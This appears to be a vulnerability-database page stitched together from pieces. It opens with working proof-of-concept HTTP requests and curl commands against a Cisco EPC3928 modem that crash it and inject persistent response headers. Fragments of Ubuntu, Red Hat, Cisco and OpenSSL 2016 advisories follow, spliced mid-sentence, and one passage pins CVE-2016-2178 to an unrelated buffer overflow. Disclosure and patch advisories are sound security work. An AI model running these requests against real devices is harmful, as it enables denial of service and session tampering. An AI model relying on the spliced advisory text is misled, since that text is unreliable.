User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug ID\x92s:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
VAR-201606-0477 | CVE-2016-2178 | OpenSSL of crypto/dsa/dsa_ossl.c of dsa_sign_setup In function DSA Vulnerability to obtain a private key |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack. OpenSSL is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information. This may aid in further attacks. Summary:
An update is now available for JBoss Core Services on RHEL 7. Of these 14 vulnerabilities, the OpenSSL Software Foundation classifies one as aCritical Severity,a one as aModerate Severity,a and the other 12 as aLow Severity.a
Subsequently, on September 26, the OpenSSL Software Foundation released an additional advisory that describes two new vulnerabilities. These vulnerabilities affect the OpenSSL versions that were released to address the vulnerabilities disclosed in the previous advisory. One of the new vulnerabilities was rated as aHigh Severitya and the other as aModerate Severity.a
Of the 16 released vulnerabilities:
Fourteen track issues that could result in a denial of service (DoS) condition
One (CVE-2016-2183, aka SWEET32) tracks an implementation of a Birthday attack against Transport Layer Security (TLS) block ciphers that use a 64-bit block size that could result in loss of confidentiality
One (CVE-2016-2178) is a timing side-channel attack that, in specific circumstances, could allow an attacker to derive the private DSA key that belongs to another user or service running on the same system
Five of the 16 vulnerabilities affect exclusively the recently released OpenSSL versions that belong to the 1.1.0 code train, which has not yet been integrated into any Cisco product. For
further information, see the knowledge base article linked to in the
References section. The JBoss server process must be restarted for the update
to take effect. Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications. ==========================================================================
Ubuntu Security Notice USN-3087-2
September 23, 2016
openssl regression
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL.
Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
USN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was
incomplete and caused a regression when parsing certificates. This update
fixes the problem.
We apologize for the inconvenience. This
issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)
Quan Luo discovered that OpenSSL did not properly restrict the lifetime
of queue entries in the DTLS implementation. (CVE-2016-2179)
Shi Lei discovered that OpenSSL incorrectly handled memory in the
TS_OBJ_print_bio() function. (CVE-2016-2180)
It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay
feature. (CVE-2016-2181)
Shi Lei discovered that OpenSSL incorrectly validated division results.
(CVE-2016-2182)
Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES
ciphers were vulnerable to birthday attacks. This update moves DES from the HIGH cipher list to MEDIUM.
(CVE-2016-2183)
Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths.
(CVE-2016-6302)
Shi Lei discovered that OpenSSL incorrectly handled memory in the
MDC2_Update() function. (CVE-2016-6303)
Shi Lei discovered that OpenSSL incorrectly performed certain message
length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make
all the necessary changes.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 6
Advisory ID: RHSA-2017:0193-01
Product: Red Hat JBoss Core Services
Advisory URL: https://access.redhat.com/errata/RHSA-2017:0193
Issue date: 2017-01-25
CVE Names: CVE-2016-2108 CVE-2016-2177 CVE-2016-2178
CVE-2016-4459 CVE-2016-6808 CVE-2016-8612
=====================================================================
1. Summary:
Updated packages that provide Red Hat JBoss Core Services Pack Apache
Server 2.4.23 and fix several bugs, and add various enhancements are now
available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 6 Server - i386, noarch, ppc64, x86_64
3. Description:
This release adds the new Apache HTTP Server 2.4.23 packages that are part
of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack
Apache Server 2.4.6, and includes bug fixes and enhancements. Refer to the
Release Notes for information on the most significant bug fixes and
enhancements included in this release. An attacker could use this flaw to create a specially crafted
certificate which, when verified or re-encoded by OpenSSL, could cause it
to crash, or execute arbitrary code using the permissions of the user
running an application compiled against the OpenSSL library.
(CVE-2016-2108)
* It was found that the length checks prior to writing to the target buffer
for creating a virtual host mapping rule did not take account of the length
of the virtual host name, creating the potential for a buffer overflow.
(CVE-2016-2178)
* Multiple integer overflow flaws were found in the way OpenSSL performed
pointer arithmetic. A remote attacker could possibly use these flaws to
cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
* It was discovered that specifying configuration with a JVMRoute path
longer than 80 characters will cause segmentation fault leading to a server
crash. (CVE-2016-4459)
* An error was found in protocol parsing logic of mod_cluster load balancer
Apache HTTP Server modules. An attacker could use this flaw to cause a
Segmentation Fault in the serving httpd process. (CVE-2016-8612)
Red Hat would like to thank the OpenSSL project for reporting
CVE-2016-2108. The CVE-2016-4459 issue was discovered by Robert Bost (Red
Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Bock, and
David Benjamin (Google) as the original reporters of CVE-2016-2108.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library
must be restarted, or the system rebooted. After installing the updated
packages, the httpd daemon will be restarted automatically.
5. Package List:
Red Hat JBoss Core Services on RHEL 6 Server:
Source:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.src.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.src.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.src.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.src.rpm
jbcs-httpd24-mod_jk-1.2.41-14.redhat_1.jbcs.el6.src.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.src.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.src.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.src.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.src.rpm
i386:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.i686.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.i686.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.i686.rpm
noarch:
jbcs-httpd24-httpd-manual-2.4.23-102.jbcs.el6.noarch.rpm
ppc64:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.ppc64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.ppc64.rpm
x86_64:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.x86_64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-2108
https://access.redhat.com/security/cve/CVE-2016-2177
https://access.redhat.com/security/cve/CVE-2016-2178
https://access.redhat.com/security/cve/CVE-2016-4459
https://access.redhat.com/security/cve/CVE-2016-6808
https://access.redhat.com/security/cve/CVE-2016-8612
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFYiQV2XlSAg2UNWIIRAvgEAKC7i1IqPLixCun/+0TTeWRG8B8tJACeJCGP
hO9ByjBnLBWhAqUDpI31vKo=
=j7tA
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. (CVE-2016-6808)
* A memory leak flaw was fixed in expat. Solution:
The References section of this erratum contains a download link (you must
log in to download the update). JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]
JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6.
OpenSSL Security Advisory [22 Sep 2016]
========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
=====================================================================
Severity: High
A malicious client can send an excessively large OCSP Status Request extension.
If that client continually requests renegotiation, sending a large OCSP Status
Request extension each time, then there will be unbounded memory growth on the
server. This will eventually lead to a Denial Of Service attack through memory
exhaustion. Servers with a default configuration are vulnerable even if they do
not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default
configuration, instead only if an application explicitly enables OCSP stapling
support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
SSL_peek() hang on empty record (CVE-2016-6305)
===============================================
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an
empty record. This could be exploited by a malicious peer in a Denial Of Service
attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The
fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
==================================
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms
that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based
ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in
OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these
ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan
Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the
OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
==========================================
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or
through the EVP_DigestUpdate() function using MDC2. If an attacker
is able to supply very large amounts of input data after a previous
call to EVP_EncryptUpdate() with a partial block then a length check
can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical
on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
===========================================
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a
DoS attack where a malformed ticket will result in an OOB read which will
ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires
a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
========================================
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word().
This can cause an OOB write if an application uses this function with an
overly large BIGNUM. This could be a problem if an overly large certificate
or CRL is printed out from an untrusted source. TLS is not affected because
record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
==============================================
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is
the total length the OID text representation would use and not the amount
of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
======================================================
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner:
"p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and
limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS
message).
The rules of C pointer arithmetic are such that "p + len" is only well
defined where len <= SIZE. Therefore the above idiom is actually
undefined behaviour.
For example this could cause problems if some malloc implementation
provides an address for "p" such that "p + len" actually overflows for
values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The
fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
===============================================================
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to
avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that
a non-constant time codepath is followed for certain operations.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto
University), Billy Brumley (Tampere University of Technology), and Yuval Yarom
(The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
=========================================
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those
messages that OpenSSL is not yet ready to process will be buffered for later
use. Under certain circumstances, a flaw in the logic means that those messages
do not get removed from the buffer even though the handshake has been completed.
An attacker could force up to approx. 15 messages to remain in the buffer when
they are no longer required. These messages will be cleared when the DTLS
connection is closed. The default maximum size for a message is 100k. Therefore
the attacker could force an additional 1500k to be consumed per connection. By
opening many simulataneous connections an attacker could cause a DoS attack
through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was
developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
==========================================
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that
arrive for future epochs update the replay protection "window" before the MAC
for the record has been validated. This could be exploited by an attacker by
sending a record for the next epoch (which does not have to decrypt or have a
valid MAC), with a very large sequence number. This means that all subsequent
legitimate packets are dropped causing a denial of service for a specific
DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team.
The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
=============================================
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in
OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical
DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and
server certificate. As a result the attack can only be performed against
a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
==========================================================================
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
conneciton in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
